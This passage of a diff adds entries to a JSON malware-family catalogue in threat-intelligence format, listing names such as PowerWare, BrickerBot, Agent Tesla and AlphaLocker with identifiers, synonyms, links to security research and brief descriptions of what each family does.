+ "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", + "value": "PowerWare", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" + ] + }, + "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", + "value": "POWRUNER", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + ] + }, + "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", + "value": "QUADAGENT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" + ] + }, + "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", + "value": "RogueRobin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", + "https://github.com/Kevin-Robertson/Tater" + ] + }, + "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", + "value": "Tater PrivEsc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", + "https://github.com/Mr-Un1k0d3r/ThunderShell" + ] + }, + "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", + "value": "ThunderShell", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", + 
"https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" + ] + }, + "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", + "value": "WMImplant", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", + "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", + "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", + "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", + "http://seclists.org/fulldisclosure/2017/Mar/7", + "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f" + ] + }, + "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", + "value": "BrickerBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", + "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", + "https://www.youtube.com/watch?v=Bk-utzAlYFI" + ] + }, + "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", + "value": "Saphyra", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", + "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" + ] + }, + "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "value": "FlexiSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", + 
"https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", + "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" + ] + }, + "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", + "value": "7ev3n", + "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"" + }, + { + "meta": { + "synonyms": [ + "Hydraq", + "McRAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", + "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", + "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", + "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", + "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", + "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", + 
"https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", + "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" + ] + }, + "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", + "value": "9002 RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PinkKite" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", + "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", + "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" + ] + }, + "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", + "value": "AbaddonPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" + ] + }, + "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", + "value": "Abbath Banker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", + "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" + ] + }, + "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", + "value": "AcridRain", + "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", + "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" + ] + }, + "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", + "value": "Acronym", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", + "https://twitter.com/JaromirHorejsi/status/813712587997249536", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016" + ] + }, + "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", + "value": "AdamLocker", + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", + "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" + ] + }, + "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", + "value": "win.adkoob", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" + ] + }, + "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", + "value": "AdvisorsBot", + "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", + "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" + ] + }, + "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", + "value": "Adylkuzz", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ComRAT", + "Sun rootkit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", + "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", + "https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/", + "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", + "https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", + "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/" + ] + }, + "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", + "value": "Agent.BTZ", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", + "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", + "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", + "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + 
"https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", + "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" + ] + }, + "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", + "value": "Agent Tesla", + "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" + ] + }, + "uuid": "43ec8adc-0658-4765-be20-f22679097fab", + "value": "Aldibot", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", + "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" + ] + }, + "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", + "value": "Project Alice", + "description": "" + }, + { + "meta": { + "synonyms": [ + "alina_spark", + "katrina", + "alina_eagle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", + "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", + "https://www.nuix.com/blog/alina-continues-spread-its-wings", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/" + ] + }, + "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", + "value": "Alina POS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Starman" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", + "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/", + "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf" + ] + }, + "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", + "value": "Allaple", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" + ] + }, + "uuid": "a0881a0c-e677-495b-b475-290af09bb716", + "value": "Alma Communicator", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" + ] + }, + "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", + "value": "AlmaLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", + "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" + ] + }, + "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", + "value": "ALPC Local PrivEsc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", + "https://twitter.com/JaromirHorejsi/status/813714602466877440" + ] + }, + "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", + "value": "Alphabet Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", + "https://blog.cylance.com/an-introduction-to-alphalocker" + ] + }, + "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", + "value": "AlphaLocker", + "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. 
The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", + "value": "AlphaNC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" + ] + }, + "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", + "value": "Alreay", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Olmarik", + "Pihar", + "TDSS", + "TDL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", + "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", + "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", + "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html" + ] + }, + "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", + "value": "Alureon", + 
"description": "" + }, + { + "meta": { + "synonyms": [ + "Adupihan" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", + "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", + "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" + ] + }, + "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", + "value": "AMTsol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gamarue", + "B106-Gamarue", + "B67-SS-Gamarue", + "b66" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", + "http://blog.morphisec.com/andromeda-tactics-analyzed", + "https://blog.avast.com/andromeda-under-the-microscope", + "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", + "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", + "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html", + "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", + "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", + "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", + "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", + "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", + "http://resources.infosecinstitute.com/andromeda-bot-analysis/", + "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", + "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", + "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", + "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/" + ] + }, + 
"uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", + "value": "Andromeda", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" + ] + }, + "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", + "value": "Anel", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Latinus" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" + ] + }, + "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", + "value": "Antilam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", + "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" + ] + }, + "uuid": "d3e16d46-e436-4757-b962-6fd393056415", + "value": "Apocalipto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", + "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" + ] + }, + "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", + "value": "Apocalypse", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" + ] + }, + "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", + "value": "ArdaMax", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", + "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" + ] + }, + "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", + "value": "Arefty", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Aaron Keylogger" + ], + "type": [], + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", + "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/", + "http://remote-keylogger.net/" + ] + }, + "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", + "value": "Arik Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", + "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", + "https://twitter.com/Racco42/status/1001374490339790849", + "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" + ] + }, + "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", + "value": "ARS VBS Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" + ] + }, + "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", + "value": "AscentLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" + ] + }, + "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", + "value": "ASPC", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Aseljo", + "BadSrc" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", + "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/", + "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/" + ] + }, + "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", + "value": "Asprox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", + "http://blog.talosintel.com/2017/02/athena-go.html" + ] + }, + "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", + "value": "AthenaGo RAT", + "description": "" + }, + { + "meta": { + 
"synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + ] + }, + "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", + "value": "ATI-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", + "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" + ] + }, + "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", + "value": "ATMii", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", + "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" + ] + }, + "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", + "value": "ATMitch", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", + "value": "Atmosphere", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", + "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", + "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" + ] + }, + "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", + "value": "ATMSpitter", + "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", + "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html", + "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene" + ] + }, + "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", + "value": "August Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Riodrv" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", + "value": "Auriga", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/" + ] + }, + "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", + "value": "Aurora", + "description": "Ransomware" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", + "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" + ] + }, + "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", + "value": "AvastDisabler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", + "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" + ] + }, + "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", + "value": "AVCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", + 
"http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" + ] + }, + "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", + "value": "Aveo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", + "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" + ] + }, + "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", + "value": "Avzhan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" + ] + }, + "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", + "value": "Ayegent", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PuffStealer", + "Rultazo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", + "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", + "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", + "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", + 